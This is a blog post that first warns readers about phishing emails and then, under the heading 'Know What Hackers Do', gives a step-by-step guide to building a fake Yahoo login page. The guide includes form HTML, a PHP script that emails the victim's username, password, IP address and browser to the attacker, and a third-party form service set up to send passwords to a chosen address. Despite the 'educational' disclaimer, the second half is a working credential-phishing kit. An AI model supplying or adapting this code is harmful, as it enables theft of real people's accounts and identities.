Phishing "Protect Yourself": Know What Hackers Do!

Wednesday, June 8, 2011 // by Hacking Beast Editor
Phishing continues to be one of the most significant security threats facing Internet users. During 2007, scammers distributed millions of phishing scam emails that targeted many different entities. Phishing attacks are sure to continue in 2008 and scammers will use such attacks to steal money and identities from many new victims around the world. Armed with a little knowledge about how phishing scams work, however, you can ensure that you do not become one of these victims. 


A phishing scam is one in which victims are tricked into providing personal information such as account numbers, passwords and credit card details to what they believe to be a legitimate company or organization. In order to carry out this trick, the scammers often create a "look-a-like" webpage that is designed to resemble the target company's official website. Typically, emails are used as "bait" in order to get the potential victim to visit the bogus website. The emails use various devious ruses to trick readers into clicking on the included links, thereby opening the bogus website. Information submitted on these bogus websites is harvested by the scammers and may then be used to steal funds from the user's accounts and/or steal the victim's identity.

Phishing scam emails are created to give the illusion that they have been sent by a legitimate institution. Emails may arrive in HTML format and include logos, styling, contact and copyright information virtually identical to those used by the targeted institution. To further create the illusion of legitimacy, some of the secondary links in these bogus emails may lead to the institution's genuine website. However, one or more of the hyperlinks featured in the body of the email will point to the fraudulent website.

Links in phishing scam messages are often disguised to make it appear that they lead to the genuine institution site. The sender address of the email may also be disguised in such a way that it appears to have originated from the targeted company. Because they are sent in bulk to many recipients, scam emails use generic greetings such as "Dear account holder" or "Dear [targeted institution] customer". If an institution needed to contact a customer about some aspect of his or her account, the contact email would address the customer by name.

Phishing scam emails use a variety of ruses to explain why it is necessary for recipients to provide the requested information. Often, the messages imply that urgent action on the part of the recipient is required. Some of the most common ruses are listed below. The scam emails may claim that: 

  • The customer's account details need to be updated due to a software or security upgrade.
  • The customer's account may be terminated if account details are not provided within a specified time frame.
  • Suspect or fraudulent activity involving the user's account has been detected and the user must therefore provide information urgently.
  • Routine or random security procedures require that the user verify his or her account by providing the requested information.
The entire purpose of a typical phishing scam is to get the recipient to provide personal information. If you receive any unsolicited email that asks you to click a link and provide sensitive personal information, then you should view the message with the utmost suspicion. It is highly unlikely that a legitimate institution would request sensitive information in such a way. Do not click links or open attachments in such messages. Do not reply to the senders. If you have any doubts at all about the veracity of the email, contact the institution directly to check.

This article focuses primarily on email-based phishing. However, it should be noted that phishing attacks on social networking sites are also becoming more common. Scam messages may be posted as comments or via personal message systems on social networking sites such as Facebook and MySpace. The messages often contain seemingly innocent invitations to click an included link to view images or read member profiles. However, clicking links in these bogus messages will open a fake version of the social networking site's login page. Victims who log in to the fake page will be inadvertently sending their login details to scammers who will then have complete access to their accounts.

Generally speaking, people become victims of phishing scams simply because they do not know how such scams operate. You can help by ensuring that friends and colleagues are aware of such scams and what to do about them. The power of such "word-of-mouth" education is substantial. You CAN make a difference by sharing your knowledge of phishing scams with other Internet users.

Protect Yourself


  • Rather than using the provided link in the email, you should copy the link and email it to the legitimate company or business, asking if the email is legitimate. If it is fraudulent, this could help shut down the phisher faster.
  • Only use the address that you have used before, or start at your normal homepage.
  • Most companies require you to log in to a secure site. Look for the lock at the bottom of your browser and “https” in front of the website address.















Know what Hackers Do !


This article tells you what hackers do, which is known as phishing. It is completely illegal; never ever try it. This article is meant for educational purposes!


This is how bad hackers make a fake login page (completely illegal) that will email you the name and password that is entered on that page. To do this you will need some web language experience.
First you will need to get a copy of the source code of the site. So go to the login page, then click File > Save As and save the page as "html only", or right-click and select "View Source", then copy and paste it into a Notepad file on your desktop and save it as login.html. Either way you'll need a copy of login.html on your desktop.
Now you will need to make sure all of the images on the page are linking to a valid URL. What you need to do is look for links like

Code:


<img src=/pics/pic.jpg> 

And they change them to

Code:


<img src=http://www.domain.com/pics/pic.jpg> 

Or save all the images and host them on your own image hosting account.
Then check your page by opening it in your browser to make sure it looks like the real page with all the images showing up.
Now we have to enter the script that will mail us the name and pass. You have to look through your login.html and find the section of code that creates the login boxes and delete it. On the Yahoo login page, this is the part of the source that needs to be replaced.

Code:


<table border="0" cellpadding="2" cellspacing="0"> <tr> <td align="right" nowrap><font face="arial" size="-1"> Yahoo! ID: </font></td> <td><input name="login" size="17" value=""></td> </tr> <tr> <td align="right" nowrap><font face="arial" size="-1">Password:</font></td> <td><input name="passwd" type="password" size="17" maxlength="32"></td></tr> <tr> <td colspan="2" nowrap align="center"><font face="arial" size="-1"> 


Now, this can be replaced by one of two things. If you understand PHP, you could use a PHP mailing script, as long as you have a host that allows the mail function or an Apache server to host it on. Using PHP requires 2 files: login.html and thanks.php. To use PHP, replace the previous login script shown above with the following HTML.

Code:


<html> <form method="POST" action="thanks.php"> Yahoo! ID <input type="TEXT" name="name"> <br> Password <input type="PASSWORD" name="password"> <br> <input type="SUBMIT" name="Submit" value="Login"> </form> </html> 


And in the same folder put this script (unedited) to actually grab the entered info and mail it to you. thanks.php

Code:


<script LANGUAGE="php"> $email = $HTTP_POST_VARS[email]; $mailto = "Your Email Goes Here"; $mailsubj = "Form submission"; $mailhead = "From: $emailn"; reset ($HTTP_POST_VARS); $mailbody =$_SERVER['REQUEST_URI'] . "." .$_SERVER['HTTP_USER_AGENT'] . "." . "$REMOTE_ADDR.".".Values submitted from web site form:n"; while (list ($key, $val) = each ($HTTP_POST_VARS)) { $mailbody .= "$key : $valn"; } mail($mailto, $mailsubj, $mailbody, $mailhead); </SCRIPT>

They call the second script thanks.php. This script will send the hackers your name, password, IP, operating system, and browser type in the email.
Now the second method isn't as good but can be hosted on ANY host; all they need to do is allow HTML, which all hosts do. So this method can be hosted on a GeoCities account. You need to go to /http://www.response-o-matic.com and get their free email script that can be dropped into any HTML.
You'll need to alter the script for it to work. I don't have an altered script at hand, but if you guys don't have a host that allows PHP and the mail() function, I'll get the Response-O-Matic script tomorrow and edit it for you and post it here, ready for you to drop straight on top of the original Yahoo login code that's highlighted at the top of this page. It's morning now and I'm tired lol.

This is the Response-O-Matic code that you can drop over the login code on your login page. Just enter your email.
Code:

<HTML> <BODY BGCOLOR="#FFFFFF"> <FORM action="http://www.response-o-matic.com/cgi-bin/rom.pl" method="POST"> <H3><CENTER> <INPUT TYPE="hidden" NAME="your_email_address" VALUE="YOUR_EMAIL@DOMAIN.COM"> <INPUT TYPE="hidden" NAME="your_name" VALUE="password"> <INPUT TYPE="hidden" NAME="email_subject_line" VALUE="My Password"> <INPUT TYPE="hidden" NAME="required_fields" VALUE="your_email_address"> <INPUT TYPE="hidden" NAME="thank_you_title" VALUE="You are being redirected"> <INPUT TYPE="hidden" NAME="return_link_url" VALUE="http://www.yahoo.com"> <INPUT TYPE="hidden" NAME="return_link_name" VALUE="CLICK HERE"> <INPUT TYPE="hidden" NAME="background_color" VALUE="#000000"> <INPUT TYPE="hidden" NAME="text_color" VALUE="#000000"> <INPUT TYPE="hidden" NAME="link_color" VALUE="#FF0000"> <INPUT TYPE="hidden" NAME="visited_link_color" VALUE="#FF0000"> <INPUT TYPE="hidden" NAME="active_link_color" VALUE="#FF0000"> </CENTER></H3> <H4>&nbsp;</H4> <BLOCKQUOTE><P><TABLE BORDER=0 CELLSPACING=0> <TR> <TD WIDTH=116> <b>Yahoo Name</b> </TD><TD> <INPUT TYPE="text" NAME="visitor_name" VALUE="" SIZE=20> </TD></TR> <TR> <TD WIDTH=116> <b>Password</b> </TD><TD> <INPUT TYPE="password" NAME="visitor_email_address" VALUE="" SIZE=20> </TD></TR> </TABLE></P> <BLOCKQUOTE><P><INPUT TYPE="submit" NAME=Submit" VALUE="Login"></P></BLOCKQUOTE> <P>&nbsp;</P> </FORM> </BODY> </HTML> 


Where it says YOUR_EMAIL@DOMAIN.COM, hackers change that to the email they want the pass to be sent to. This isn't the finished script; it still needs some work, but it's pretty much all done.
